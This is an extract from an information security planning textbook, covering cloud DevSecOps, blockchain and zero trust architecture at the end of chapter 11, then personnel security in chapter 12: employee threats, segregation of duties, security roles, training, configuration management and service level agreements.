11.7 Step 7: Monitor and Manage Changes in the Cloud The contract defines which measures are available from the cloud provider. Statistics may be obtained from the users’ or provider’s controls according to the shared responsibility model and SLA. Monitoring third-party audit results, if so contracted, is a snapshot of quality of security. For security purposes, it is important to have knowledge about statistics and events, and in fact a good baseline can help in security monitoring. When an incident occurs, it is impossible to do forensic analysis onsite. However, the VM can be imaged for forensic analysis [7]. It is recommended to analyze logs, not only from the VM but also its host machine. Note that criminals often establish their own clouds in nations that limit forensic oversight. Key Process Indicators related to cloud deployment may include [4]: • • • • • •

Number of open security vulnerabilities False positive rates of reported vulnerabilities Time to detect security vulnerabilities Time to fix security vulnerabilities Number of security vulnerabilities found after deployment Cost to fix audit issues

Some of these statistics are difficult to measure properly or require fine tuning, including time-to-detect and false positive rates. Also, open vulnerabilities should

212

11  Planning for Alternative Networks: Cloud Security and Zero Trust

be resolved by priority, and not simply to lower statistics. Finally, numbers of vulnerabilities tend to follow patterns and tend to increase following deployment. KPIs related to cloud software deployment include [4]: • Automated test coverage • Change cycle time: Time to build and deploy • Rate of build delays due to security issues

11.8 Advanced: Software Development with Dev-Sec-Ops Dev-Sec-Ops refers to Development-Security-Operations, which translates into these three groups working closely together to secure software during development and deployment. Dev-Sec-Ops Concepts include [4]: Continuous Integration/Continuous Delivery (CI/CD)  Automated build, integration, testing, and deployment ensures that both new applications and software patches are automatically configured and deployed quickly, following compliance policies. Automated and thorough testing is very important in this scheme. (An attack on SolarWinds software took advantage of automatic building to insert a backdoor via an attack ‘software update’ that was propagated to its customers. SolarWinds took a number of steps to fix this vulnerability, including analyzing the build against source code to ensure correctness.) CI/CD can be implemented using specific programming languages to automatically configure and provision a software stack for deployment on the cloud. For example, Terraform has an HCL high-level language that can be used across multiple cloud providers. Compliance Testing  Asserts or guard rails are true/false tests that enable policy checking within the code, thereby automating test results and facilitating auditing via these audit hooks. Open source tools have been developed to accomplish this: AWS CloudFormation Guard, Chef InSpec, Conftest, Dev-sec.io, and Terraform Compliance. Continuous Monitoring  The Cloud Trust Protocol (CTP) defines an API that enables customers to automatically query the security status of their cloud services.

11.9 Advanced: Using Blockchain Blockchain is a solution that helps to encrypt and ensure integrity for transmissions. It is used to process bitcoin, smart contracts, financial transactional requests and is expanding use in Internet of Things (IoT) [14].

11.10  Advanced: Zero Trust

213

Fig. 11.5  Processing Blockchains

Blockchains provide a decentralized, system of distributed and replicated nodes [14]. Transactions must be correctly ordered through all nodes using consensus algorithms. The public-style Proof-of-Work blockchain is started by User A submitting a transaction to User B which is broadcast and saved in the blockchain memory pool. (See Fig.  11.5) A ‘peer’ miner process selects a transaction, generates a numerically complex hash to confirm the transaction and creates a block, and adds the block to the blockchain and back to the distributed memory pool. Algorithms are also defined to ensure unanimously-ordered transactions. Transaction processing confirms that the sender has the required finances, and the sender signs the transaction with their digital signature, providing non-repudiation. Users submitting transactions pay a mining fee to incentivize miners to perform the necessary processing. However, blockchain is not foolproof [14]. Public blockchains (including Bitcoin) can be problematic, since they provide anonymous access to the public. Distributed DOS attacks have considerably slowed down processing. Integrity hash code failures have resulted in spoofed transactions costing millions of dollars. Private blockchains are more protected because users are vetted, known and trusted.

11.10 Advanced: Zero Trust Many people have the impression that security consists of building a safe firewall, and all network traffic within the firewall’s perimeter can be trusted. This is a false assumption, since the first level of attack is to get a foothold within the internal network, and then successive steps occur within the network. That first level of attack may occur via phishing, pharming, SQL attacks, and other means. In addition, bring-your-own-device (or the use of private devices within the organization) also introduces minimally or uncontrolled devices within the network perimeter.

214

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Finally, where is that perimeter when an organization depends heavily on the cloud or a third party organization? Zero Trust Architecture depends upon deperimiterization, which limits trust based on the internal network location alone [13]. Furthermore, zero trust assumes the internal network is already compromised and that criminals are already crawling around the organization’s network. These are not unreasonable assumptions. To counter these assumptions, zero trust uses artificial intelligence to confirm that all transactions are based on a current status of least privilege. Although zero trust is a new implementation, Zero Trust has already proven to be effective: IBM Security’s Cost of a Data Breach Report indicates that the total average cost of a data breach, normally $5.04 million, can be reduced to $3.71 million or $3.24 million with a middle stage or mature stage zero trust deployment; a considerable savings [8].

11.10.1 Important Concepts The zero trust architecture continually determines confidence in transactions, by evaluating risk in real time, based on each subjects’ [13]: • • • •

Multi-factor authentication at initiation of connection; device configuration, location and time of access, etc., permissible behavior, and current behavior in comparison to traditional behavior, and • permissions or access control and their recent actions related to devices and data. Thus, authorization is managed by automated security (artificial intelligence) and may change due to time-of-day, state of resource, and the subject’s behavior. Zero Trust principles include [13]: • All data sources and computing services are considered resources. Therefore, all enterprise-owned resources are carefully classified. • All communications are secured regardless of network location: All transmissions inside or outside an enterprise network are equally subject to CIA. • Access to individual organizational resources is granted on a per-session basis: It is important to confirm the subject’s identity who initiates the transaction and enforce least privilege access to authorized individuals. However, authentication is provided on a per resource basis (not per transaction). • All resource authentication and authorization are dynamically and strictly enforced before access is allowed: Policy and risk decide (re)authentication and permissions. • Access to resources is determined by a dynamic policy: Risk is evaluated based on multiple factors, including client identity, service requested, asset configuration, past history and other current factors.

11.10  Advanced: Zero Trust

215

• The organization monitors and measures the integrity and security posture of all owned and associated assets: All devices and assets are monitored for intrusion, vulnerabilities, and patching; associated assets include bring-your-own-device. • The organization collects information continually to achieve a current state of assets, network infrastructure and transmissions, in order to maintain an accurate security state. Risk is determined by monitoring the current state of the complete network picture.

11.10.2 Zero Trust Architecture These principles are achieved through a secure architecture, which is composed of a variety of security-controlled components. Those components update continuously, based on a set of inputs, including access control permissions, policy, current security status and threat intelligence. Policy can be controlled via an industry compliance system, which restrains policy related to regulation (e.g., HIPAA or GDPR). Access control is then implemented using an ID Management system, which manages user accounts and identity (e.g., Microsoft Lightweight Directory Access Protocol or LDAP) via permissions allocated to roles and/or individuals. A current security status may be fed by a Security Information & Event Management (SIEM), which tracks network, system and application events; a Threat Intelligence Feed, which provides internal and/or external sources of newly found threats; and a Continuous Diagnostics and Mitigation (CDM) system, which tracks the status of vulnerabilities, patching, and metrics collection. Finally, Enterprise Public Key Infrastructure generates and tests certificates related to authentication/authorization [13]. Figure 11.6 shows the general structure of a zero trust network. The client system contains an Agent, which interfaces with the Policy Decision Point. A Policy Decision Point (PDP) serves as a source of intelligence that decides on a per-­ transaction basis whether each proposed transaction may complete or not. The PDP includes two parts: a Policy Engine and Policy Administrator. The Policy Engine makes and logs accept/reject decisions, based on the set of inputs discussed previously, as well as current subject history: unusual time, source location, number of accesses, and other forms of unusual or illegal behavior. The Policy Administrator then informs the Policy Enforcement Point of the decision, which may range from accepting the transaction to closing the connection [13]. The Policy Enforcement Point (PEP) is like a sophisticated proxy/firewall that optimally protects on a per-device basis, ensuring that all transactions are approved before being processed by the Device(s) it protects. The PEP thus has the abilities to enable, monitor, and terminate connections. The PEP can be housed within the Device providing service, or be separate from it. There are three possible configurations for zero trust networks, according to the National Institute of Standards and Technology (NIST) [13]. The first, Identitybased access, is the simplest and least mature. It checks for permissions on a

216

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Software Defined Network: Configuration

Transaction Request Actual transaction

Subject

Enterprise System with Agent: Interfaces with PA/PE

Policy Administrator/ Policy Engine: Decision = EvaluateTransaction( request, policy, input)

Policy Enforcement Point: Gateway ensures all transactions are approved

Resource or Set of resources

Fig. 11.6  Zero trust architecture

granular, transaction basis, allocated based on the source identity. This technique is useful for Cloud Services, where the server may be separate from the local device, and be housed within a virtual machine or container. The major issue with this configuration is a limited visibility into client system configuration. The second possible configuration is Micro-segmentation, where an individual or set of resources is protected by a local gateway/PEP, as is shown in Fig. 11.6. Multiple legacy systems may use a single PEP. However, this configuration has a higher possibility of cross-contamination, where one Device becomes infected and infects its neighbors, inside the PEP’s internal network. A Software defined network is the most sophisticated configuration, where a dynamic micro-network reconfigures as necessary. The PEP configures communications channel for the Subject to interface with the Resource (e.g., IP address/port, encryption key). The PEP may be software agent within Resource or separate device. While Fig. 11.6 appears as a single-network solution, zero trust is designed to be cloud-compatible. An advantage of a cloud implementation is that the cloud can provide high availability and remote access to any service and/or PDP, when contracted to do so. Even though common apps may be available in cloud (email, web), their PDP may be located in the same or a different cloud or in the home network, although the PEP should be located with its Resource. (See example Fig. 11.7) The PEP provides statistics to the PDP and gets configuration permissions from the PDP, but may or may not be located with the PDP. For better transparency, the intention is that clouds may use different systems.

11.11  Zero Trust Planning

217

Fig. 11.7  A potential zero trust cloud configuration

11.11 Zero Trust Planning The basic steps to implement a zero trust network include [13]: Inventory and assess data flows; assess risk; deploy and manage operations. Step 1: Inventory and assess data flows, workflows, subjects You may leverage your information classification and role-based access control from the Information Security chapter. Step 2: Assess risk It is useful to test out a small application first, and expand applications as the organization gains confidence in its zero trust implementation. To consider that first or second pilot application, consider: • Which applications require higher levels of confidentiality and integrity that could benefit from zero trust? • Which application(s) are accessed more remotely, benefitting from the increased security of a zero trust configuration? • Which small application(s) might act as a pilot platform, with lower availability and reliability requirements for initial testing? Step 3: Develop policy Consider how to use zero trust to further restrict access to roles and verify device configurations. Part of this risk assessment is to tighten policy around selected application(s), but not to hinder valid access to the resources. The goal of a tuning phase is to find a good balance. It will be important to find technical compatibility between zero trust components, to support the application and ensure sufficient security to guard and monitor it.

218

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Step 4: Deploy and monitor operations It may be helpful to be somewhat lenient in the policies initially, balancing with greater logging and monitoring, until anomalous behavior is automatically recognized.

11.11.1 Network and Cloud Checklist for Zero Trust Here is a recommended checklist that a zero trust network would enforce [13]. Architectural points: 1. The Zero Trust Architecture must be scalable to support expected and increased traffic capacities. 2. PEPs are accessible to policy-approved devices, but may not be accessible to all organizational devices, such as international locations. 3. The Organization tracks all affected network data. The Policy Engine is aware of and tracks all communication metadata (from the data plane), enabling the policy to be dynamically updated. This metadata includes the time, destination, and device ID. 4. Zero Trust Architectures are cloud-compatible: It is not necessary to traverse the organization’s private network to access a Resource; nor is it required that virtual private network protocols are used. Security details: 1. The Network must be able to validate that Source device is an enterprise-owned/ managed device and uses enterprise-issued credentials. This is important because the IP/MAC address can be spoofed. 2. Resources should not be discoverable except through PEP (except network devices e.g., DNS) and these resources can only be accessed after being filtered by a PEP. 3. The data plane and control plane are logically separate, meaning that the data connection between client (containing an agent) and Resource cannot contain commands to accept or reject the transaction. The two protocol components may be physically separate.

11.12 Questions 1. Cloud Vocabulary. Match each meaning with the correct word. Blockchain Private cloud Hybrid cloud

Platform as a service Public cloud Community cloud

Software as a service Disaster recovery as a service Infrastructure as a service

11.12 Questions

219

Shadow IT

Multitenancy

Multicloud Continuous testing

Dev-sec-ops Continuous monitoring

Continuous integration/continuous delivery Service level agreement Shared security model

(a) Employees may be using cloud services without their business knowing about it (b) A customer uses multiple cloud platforms to implement software solutions (c) Consumer provides application software; cloud provider generally provides system and software development environment (d) Cloud build is patched and deployed automatically (e) A solution that orders, encrypts and ensures integrity for the transmissions of transactions (f) Customer can get security status on their cloud system on demand (g) An issue where a customer may share cloud hardware/software with other customers (h) A business contract between a cloud provider and cloud user (i) A cloud service is open to any organization (j) The cloud service provider provides all aspects of implementation: hardware, OS, software (k) A group within a business that helps to configure, secure and manage cloud software (l) A cloud service that is configured for a particular industry, via support of industry-specific software and regulations (m) When using the cloud, it is important to evaluate which security controls are provided by the cloud versus the customer 2. Security Planning: Consider an industry you currently work in or would like to work in. Assume you want to move your main database into the cloud. Prepare security requirements for the Service Level Agreement, by providing answers or research notes for the questions in Step 2. These are also provided in the Workbook. 3. Zero Trust Vocabulary. Match each meaning with the correct word. Micro-segmentation Policy decision point

Software defined network Policy enforcement point

Identity-based access

(a) A configuration where individual or small set of resources are protected by a Policy Enforcement Points (PEP) (b) A component in a zero-trust network responsible for evaluating the appropriateness of a transaction, based on user authorization, past history, recent actions, current threats (c) A configuration where granular permissions are allocated based on source identity (login, IP, time, date)

220

11  Planning for Alternative Networks: Cloud Security and Zero Trust

(d) A configuration where micro-networks may be reconfigured dynamically as necessary (e) A component in a zero-trust network that serves as a firewall; implementing policy to accept or reject transactions

References 1. Ardagna CA, Asal R, Damiani E, Vu QH (2015) From security to assurance in the cloud: a survey. ACM Computing Surveys 48(1):2.1–2.50 2. Baginda YP, Affandi A, Pratomo I (2018) Analysis of RTO and RPO of a service stored on Amazon Web Service (AWS) and Google Cloud Engine (GCE). In: 2018 10th International Conference on Information Technology and Electrical Engineering (ICITEE), Inst. Electrical & Electronic Eng. (IEEE), http://ieeexplore.ieee.org, pp 418–422 3. Behl A, Behl K (2012) Security paradigms for cloud computing. In: Fourth international conference on computational intelligence, communication systems and networks. IEEE Computer Society, Inst. Electrical & Electronics Eng. (IEEE), http://ieeexplore.ieee.org, pp 200–205 4. Bird J, Johnson E (2021) A SANS survey: rethinking the Sec in DevSecOps: Security as Code, SANS Institute, June 2021 5. Cichonski P, Millar T, Grance T, Scarfone K (2012) NIST special publication (SP) 800-61 computer security incident handling guide, Rev. 2. Aug 2012. National Institute of Standards and Technology, pp 261–262 6. Cloud Security Alliance (2021) Security guidance for critical areas of focus in cloud computing, Version 4.0. https://cloudsecurityalliance.org/download/security-guidance-v4/ 7. Easttom C (2019) System forensics, investigation, and response, 3rd edn. Jones & Bartlett Learning, Burlington 8. IBM (2021) Cost of a data breach report 2021. IBM 9. ISACA (2020) CDPSE review manual. ISACA, Schaumberg 10. Krutz RL (2010) Cloud security: a comprehensive guide to secure cloud computing. Wiley, Hoboken, p 2, 39–45 11. Messier R (2017) Network forensics. Wiley, Indianapolis 12. Perlroth N, Shane S (2013) As FBI pursued snowden, an e-mail service stood firm. New York Times, Oct. 2, 2013 13. Rose S, Borchert O, Mitchell S, Connelly S (2020) NIST special publication 800-207 zero trust architecture. National Institute of Standards and Technology (NIST), Gaithersburg 14. Saad M, Spaulding J, Njilla L, Kamhoua C, Shetty S, Nyang DH, Mohaisen D (2020) Exploring the attack surface of Blockchain: a comprehensive survey. IEEE Commun Surv Tutor 22(3, 3rd Quarter 2020) 1977–2008. 15. Shackleford D (2021) A SANS survey: network security in the cloud. SANS Institute 16. Tang J, Cui Y, Li Q, Ren K, Liu J, Buyya R (2016) Ensuring security and privacy preservation for cloud data services. ACM Computing Surveys 49(1):Article 13. June 2016 17. Wagenseil P (2022) What is SASE? SC Magazine, Nov. 11, 2022. From: https://www.scmagazine.com/resource/cloud-­security/what-­is-­sase 18. Ruback H, Richards T (2021) Applying the AWS Shared Responsibility Model to your GxP Solution. 9 February 2021, Amazon. Taken 1/25/2023 from: https://aws.amazon.com/blogs/ industries/applying-the-aws-sharedresponsibility-model-to-your-gxp-solution/

Chapter 12

Organizing Personnel Security

Among the few high-profile organizations that was not actually hacked last year was the Democratic National Committee. Going into 2020, Bob Lord, the D.N.C.’s first chief information security officer, employed a novel approach to help ensure that hackers stayed out of D.N.C. emails this time. He posted signs over the urinals in the men’s room and on the wall in the women’s room reminding everyone to run their phone updates, use the encrypted app signal for sensitive communications and not click on links. –Nicole Perlroth, author, They Tell Me This Is How The World Ends, and NY Times cybersecurity writer [1]

What does computer security have to do with personnel? Verizon’s 20222 Data Breach Investigation Report reveals that 82% of breaches involve people [2], whether through stolen credentials, phishing, misuse or simply unintentional error. Of errors, misconfiguration and incorrect deliveries are two mistakes that cause breaches. These are solely attributable to internal actors (commonly employees). Misdelivery usually occurs when emails are sent to the wrong person(s) but can also involve physical documents. However, lost or stolen laptops, cell phones, documents and backups are commonly left in a car  – or elsewhere. Privilege misuse includes people using privileges required to do their jobs to steal information for financial, espionage, or grudge reasons, or may include people bypassing security controls for convenience [2]. Social engineering attacks are another security issue, whether phishing or stolen credentials (e.g., business email compromise). Security experts are less likely to make simple security mistakes with phishing, whereas ordinary staff are. If a social engineer pretends to be system administrator and asks an employee to do some suspicious actions, the security staff will not likely be fooled, but some ordinary staff could. Since security is only as strong as the weakest link, a major goal of personnel security is to ensure that all staff understand policies, know their security responsibilities, and are sufficiently trained to perform these security responsibilities. Thus, it is useful for the security designer (you) to have completed all of the pertinent chapters in the book, so that you can define the security roles and training. How can you assign security responsibilities and design security training unless you understand what each role involves?

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_12

221

222

12  Organizing Personnel Security

Documentation serves as a contract to manage both employees and contractors. A second goal of this chapter is to discuss documentation aspects of managing projects, enforcing accountability, and tracking internal documents: Configuration Management and Change Management, as well as the development of external contracts: Service Level Agreements. Another major goal of Personnel Security is fraud prevention. Approximately 14% of breaches are attributed at least in part to internal employees. Employees about to leave or who have left the organization cause 70% of internal information theft [3]. This can be caught by monitoring changes in access patterns to information. Much of this can be prevented by disabling all corporate accounts and access permissions for terminating employees. In this chapter, we will look at the risk of fraud, first. Secondly, it is important to document security responsibilities to employee roles. Thirdly, it is important to train for those roles. Finally, it is important to provide the tools required for those security roles to accomplish their jobs.

12.1 Step 1: Controlling Employee Threats Personnel and customers are both a potential weakness in the security defense system, as well as a potential source of fraud. Many of these threats are industry specific. For example, a bank would be susceptible to the sale of credit card numbers, and creation of fake accounts with transferred money. Table  12.1 on Personnel Threats lists example threats to Einstein University that could be subverted by staff. This table considers which roles are most likely to involve this fraud or security vulnerability, and the potential liabilities. While this task is somewhat repetitive with risk management, it is amazing what new important ideas come up when we focus on staff, instead of the external threats we tend to emphasize during risk analysis. Therefore, it is a good idea to think of threats independently now, then copy over any employee-related threats from the Risk chapter (and perhaps the new threats to the Risk chapter!) Our next job is to consider controls for these risks. The most significant control is Segregation of Duties, which was introduced in Chap. 2. Here we will apply the concepts. Remember that good management ensures that no one person can defraud the system. Roles are categorized into Origination, Authorization, Verification, and Distribution, which originate, approve, double-check, and act on, respectively. Table 12.1  Listing personnel threats (workbook exercise) Threat Divulging private info Skim payment cards Grant abuse Abuse of student

Role Employee Salesperson, IT Employee with grant Employee, student, visitor

Liability or cost if threat occurs FERPA violation = loss of federal funds PCI DSS, state breach violation Loss of funds from US granting agencies Bad press – loss in reputation May incite lawsuit

12.1  Step 1: Controlling Employee Threats

223

These will be implemented in the computer system using authorization (logins, forms) and access control (permissions). Figure 12.1 shows business relationships in a larger organization, which includes software development [4]. Notice that Security/Compliance would tend to ‘authorize’ aspects of software development, while quality control ‘verifies’ software development. System/network admin ‘distributes’ software to business, who is the user. Audit ‘verifies’ all other systems at a high level, by verifying their processes are defined safely and adhered to. These authorization/verification types of activities add a layer of approval. If separation of duties is not possible to attain due to organization size, job rotation and mandatory vacations are compensatory controls. Techniques that help to prevent security breaches and fraud and/or shorten the duration of undetected fraud include preventive and detective/deterrence controls, such as [4–7]: Preventive Controls: • Chief Information Security Officer: Naming a CISO (or maybe at least a Security Manager for small companies) makes someone responsible for security. A dedicated person allocated to the security function (whatever the title) is a requirement for E.U.’s GDPR and U.S.’s HIPAA, Gramm-Leach-Bliley and FISMA. Other important personnel functions include (defined elsewhere): • Data Owner, Process Owner: Allocates permissions, defines safe processes. • Info Security Steering Committee: Management with knowledge of business and/or security functions defines security (e.g., working with Security Workbook). • Incident Response Management/Team: Decides or performs functions related to incident response. • Security Analyst, Security Administrator: Security staff to design or implement security functions.

Fig. 12.1  Business relations for Segregation of Duties

224

12  Organizing Personnel Security

• Security awareness training: Discussion of organization policies, legal compliance, appropriate password selection, appropriate use of computer, appropriate handling of confidential or proprietary information, recognizing social engineering and reporting security events. • Training and written policies and procedures: include appropriate skills and knowledge of standards to do the job. Payment card policies regarding handling and security are necessary for those handling sales. Training to recognize and report fraud can be geared towards specific  employees and management. ­Management, IT, software development and security teams need more extensive training in information security. • Signed agreements: Lists job responsibilities, security requirements, confidentiality agreement, proper computer (e.g., email) use. Three recommended policies for employees and one for contracts include [8]: • Code of Conduct: Describes general ethical behavior requirements. • Acceptable Use Policy: This should address what, when, where, how and why company data can be accessed. If a mobile device is used for business purposes, it should address who can use the device: children are off-limits. It should address what is an allowable device for accessing organizational data (e.g., personal devices), how organization’s devices can be used (e.g., permissible websites, installing software, cloud use). • Privacy Policy: Defines proper behavior in regards to company confidential information, such as regulatory requirements. Includes policies on password quality and secrecy, maintaining physical security, locking terminals, and reporting security issues. • Service Level Agreement: This contract specifies required levels of service between a customer and provider. There is a separate subsection on this later in this chapter. • Ethical Culture: To combat fraud, it is not sufficient to merely write policies; management must live, mentor and insist on ethical behavior. • Employee Support Programs: Help employees cope with personal and financial problems before they become unmanageable. • Background checks: Background checks are important for any employee who handles protected identifiable information (PII) or payment cards. It is also a good idea to screen security and system administrators since they often have full privileges on computers. • Need to Know/Least Privilege: As per information security  requirements, these define the minimal access to information per role. PCI DSS requires a list of roles with documented business need, including reasons  why those roles should be able to view payment card primary account numbers [7]. Detective (and Deterrence) Controls include: • Fraud reporting or hotline mechanism: Customers and employees can discreetly (and preferably also anonymously) report potential fraud to internal audit, an ethics officer, or an independent agent. This may include rewards for whistleblowers.

225

12.1  Step 1: Controlling Employee Threats

• Identification badges: Badges help to distinguish between onsite employees, contractors and visitors. All badges should be strictly controlled, with visitor badges expiring and surrendered daily. The visitor log should be retained for three months or more [7]. Badges are required by PCI DSS for sensitive areas where cardholder data is processed or stored. • Logged transactions: Some transactions should be logged, providing the potential for review. Computer systems normally log important events like clearing the logs, changing log or security configurations, logging on or off a system, installing software, etc. HIPAA requires personnel to log medical transactions. Any adjustment of financial or monetary transactions should also be logged. Some of these transactions should be authorized by a manager before implementation. • Internal Audit Department and Surprise Audits: These are effective means to detect and deter fraud, and ensure compliance. • Mandatory vacations or job rotation: Inappropriate performance will eventually be recognized. Corrective Controls include: • Employee Bonding: Insurance protects against losses due to theft, mistakes and neglect. (This is illegal in some countries.) • Fidelity Insurance: Insurance against fraud or employee misdeeds is useful for rare but expensive risks. Table 12.2 considers how specific threats from Table 12.1 can be controlled using segregation of duties or another control listed above.

Table 12.2  Example personnel controls for Einstein University (workbook exercise) Threat Divulging private info

Grant abuse, travel abuse Abuse of student

Abuse of financial information, payment card theft

Role Employee: instructor, advisor, registrar, administrator Employee with grant or funding

Control FERPA security and training: annual quiz, new employee training

Financial controls: employee’s administrator and financial office double-check expense. Instructor, advisor, or any Background check at hiring. Policy of employee who deals with warning, monitoring and termination students. upon repeated offense. Salespersons with access to Background check at hiring. Policy of PoS, suspension, review and termination upon IT or security staff with substantiated suspicion. access to financial Adhering to PCI DSS. Regular information. monitoring of devices.

226

12  Organizing Personnel Security

12.2 Step 2: Allocating Responsibility to Roles At this point we have (hopefully) thoroughly considered all threats caused by insiders. We can now proceed to our second major personnel goal: coordinating responsibilities and training across our staff. This is a coordinated effort which considers all the other chapters in the Workbook, including: policy, risk, business continuity, information security, network security, physical security, incident response, personnel security (previous tables), and metrics. In Table 12.3, two positions have Workbook-suggested job responsibilities (in type) while university-specific responsibilities are shown via italic script. In the table below, it may be useful to specify a name next to a role, such as a manager or Table 12.3  Responsibility of security to roles (workbook exercise) Role Chief Info Security Officer: John Doe

Personnel: Alice Strong

Security Admin

Registrar

Office Admin., Advisor Managers of staff handling payment card sales

Responsibility Lead Info Sec. Steering Committee and incident response teams. Lead efforts to develop security policy, security workbook. Manage security projects, budgets, staff. Lead security training for required staff on FERPA, PCI DSS, HIPAA, state breach. Maintain security program: metrics, risk, testing, and policy revisions. Participate in Information Security Steering Committee, Incident Management Team. Tracks and documents theft (to determine pattern). Prepare/manage contracts with Third Party contracts, establishing expectations relative to security. At hiring: Perform background check for persons handling confidential info/major assets or interfacing with students. Write job description considering segregation of duties, security responsibilities. Employee:  Signs Acceptable Use Policy;  Takes security awareness training including compliance, policy training. At termination: Revoke computer authorization, return badges/keys and equipment, notify appropriate staff. Monitor logs for secure systems daily Enable/disable permissions according to data owner’s directions Configure security appliances; audit equipment Rebuild computers after malware infection Investigate incident response, collect security metrics as part of Incident Response Team. Establish FERPA and security training Data Owner: student scholastic and financial information Oversee FERPA adherence in Registration dept. Adhere to FERPA; attend security and FERPA training Retain locked cabinets with student info Ensure sales staff is trained in pertinent PCI DSS requirements. Inspect PoS machines per shift.

12.3  Step 3: Define Training for Security

227

department name. This table will turn into a description of security job responsibilities for each position. Note that these descriptions are simply suggestions, and you may edit them in the Security Workbook as you like. It is highly recommended that someone acts as a Chief Information Security Officer. This role is required by HIPAA. In larger organizations it should be a full time position.

12.3 Step 3: Define Training for Security Now that we have an idea of the security roles and responsibilities, we need to make sure that employees are trained to do their security responsibilities – and consider which documents and written procedures will help them to perform each role. Training can be required before hiring, taught at hiring, and thereafter performed periodically. There are three types of security training: security awareness for most employees, security training for people involved with security, and security education for security specialists. Security awareness and other training is a requirement of most security regulations. Security Awareness  This training is important for nearly everyone in the company, including anyone who uses a computer, handles payment cards, or accesses protected information or PII. Training can include contractors, vendors and partners. This training makes staff aware of organizational policies and trains them in permitted use of computers. Training occurs through single classes, meetings, web or video training, newsletters, quizzes and posters [12]. PCI DSS requires that training occurs at hiring and at least annually thereafter. PCI DSS also requires that two mechanisms are used for training and that appropriate employees sign that they have understood the security policy [7]. Defined risks from Chaps. 1 and 2 of this text – which relate to your business – provide the kind of knowledge that all staff should be aware of. Specifically, this training may include smart computer use, including choosing passwords, avoiding email and web viruses, recognizing potential malware issues, and (potentially) backing up work-related files; and recognizing or preventing fraud through recognizing social engineers, reporting security incidents, and securing confidential or proprietary information in paper or other media form [12]. People should understand why the policy is in place and the consequences of non-adherence. Security awareness training is important, but can be totally ineffective. Measuring that staff (1) understand and remember security policies, and (2) implement security, can help to determine the effectiveness of the training. Security Training  Certain staff, such as medical staff, human resources, management, software developers, and IT, need security training specific to their responsibilities. This training is often received through workshops or conferences.

228

12  Organizing Personnel Security

Security Education  Education is extended training used to prepare people whose primary responsibility involves security, such as auditors, risk managers, security analysts, software developers, and security administrators. Education develops both core skills and a high level understanding. It is taught through a formal course, book learning and/or through informal coaching. A list of topics deemed relevant to information security professionals is called the Common Body of Knowledge (CBK), and security certifications focus on these topic areas. Continuing education is important for those whose jobs involve a high level of security. Security is one of the fastest moving fields, even compared to the fast-­ moving computer field. Security and incident response personnel must have annual security training. Most security certifications require annual training to remain certified. Security personnel need continual training to maintain certification. Table 12.4 shows the annual training requirements for various security certifications, given in hours of training required. Table 12.5 describes the training and documentation requirements needed for various roles with security functions. Table 12.5 has Workbook-suggested text for three positions, and a few university-specific roles. A final reminder is that to perform this chapter correctly, it helps to review all previous chapters to ensure that all security functions have been integrated into this Personnel chapter. You will also need to do that for chapters on Metrics and Incident Response. Also, you will find that your evolved security understanding will help to improve your earlier chapters work.

12.4 Step 4: Designing Tools to Manage Security An important tool to manage IT people, projects, and security is documentation. Some documents are for external use, such as a contract (e.g., Service level agreement – SLA) which guides the agreement between two organizations. Some internal documents describe human resource policy, such as a Code of Conduct or Acceptable Use Policy, which guide personnel actions. Some internal documents track product or process changes, such as Configuration Management or Change Management, both which retain golden artifacts of how a product or process has changed. Some internal documents are for use in product development, such as a security plan, design, or code implementation. These are described in the Secure Software section. Table 12.4  Continuing education requirements for security certification Security certification(s) CISSP, CISA, CISM, CRISC, CEH SSCP, CAP, HCISPP Security+ Other CompTIA certificates

Minimum 1-year requirement 20

Minimum 3-year requirement 120

10 – –

60 50 20–75

229

12.4  Step 4: Designing Tools to Manage Security

Table 12.5  Requirements for security roles: training and documentation (workbook exercise) Role Chief Info Security Officer

Security Administrator, Security Analyst, CISO

Registrar

Sales Manager, CISO

Employee handling student data

Incident Response Management Team: CISO, select business mgmt., human resources, risk, legal, public relations, physical security, IT Incident Response Team: Security and IT

Requirements: training, documentation Training:  Security certification required at hiring.  Annual security maintenance training: 40 hours/year. Documentation:  Development of Security Workbook, legal compliance checklist Training:  Security certification required at hiring.  Annual security maintenance training: 17 hours/year Documentation:  Disaster Recovery Plan  Incident Response Plan Training: FERPA experience in hiring.   Training every 1–3 years at national conference or workshop Documentation: Development of FERPA Policy Training to adhere to PCI DSS annually Documentation: Payment Card Policy Training: FERPA annual quiz Documentation: University FERPA web page,   signed acceptable use policy Training: External training or led by CISO Documentation: Incident Response Plan Training: Internal and/or external training Documentation: Incident Response Plan

12.4.1 Code of Conduct and Acceptable Use Policy The Security Workbook has an example template for a Code of Conduct. However, ACM, IEEE and ISACA also have Code of Conducts for each of their organizations that can serve as examples. For the Acceptable Use Policy, SANS has an extensive template. Many organizations list shorter versions online that can be adapted.

230

12  Organizing Personnel Security

12.4.2 Configuration Management and Change Control Important documents need to occasionally be recorded at specific moments in time, since they often serve as a contract within or between organizations. Documents evolve, and thus multiple versions of documents will need to be recorded and managed. This is the function of Configuration Management [9]. From an organizational perspective, configuration management helps control regulatory and policy compliance, provides documentation for audits, and serves as a source of information for incident response [10]. A configuration management system is a central repository, which is similar to an electronic library document management system. Important documents are maintained in this repository. For software development teams, this includes requirements, design and test documents, program code and project, audit and security plans. The repository holds a snapshot of different versions for each document, thereby maintaining a history, so that any version can be retrieved at any time. This document management system does permit users to checkout a document; edit, review or approve the document; and check it back in. Revised documents are allocated an increased version number. The revision-author and reason for revision is recorded at check-in and is later available as part of the version history. Change management is the process that creates different configuration management versions. Change management usually starts with a change proposal: (1) a Change Request, which may be (2) analyzed and approved by management for implementation. The change is then (3) implemented (e.g., programmed or acted upon) and this change may be (4) tested and approved, when the change is ready for deployment. Documentation for each of these stages is maintained in a change management or configuration management repository, and emails may notify stakeholders of changes of status. From an organizational level, major changes need to be approved by upper management, and then be communicated to impacted users to get their support [5]. The communication shall explain how the change should affect them, the benefits and impact. After implementation, it is useful to obtain feedback on the product, training and any documentation.

12.4.3 Service Level Agreements A Service Level Agreement (SLA) is a contract to outsource any IT or other sensitive service, potentially including networking, business continuity, security or information security. An SLA should cover the following sections, to ensure that performance, security, legal compliance, and payment are agreed upon [9]: • Introduction and Scope of Work • Performance, Tracking and Reporting • Problem Management

12.5  Questions and Problems

• • • • • • • • •

231

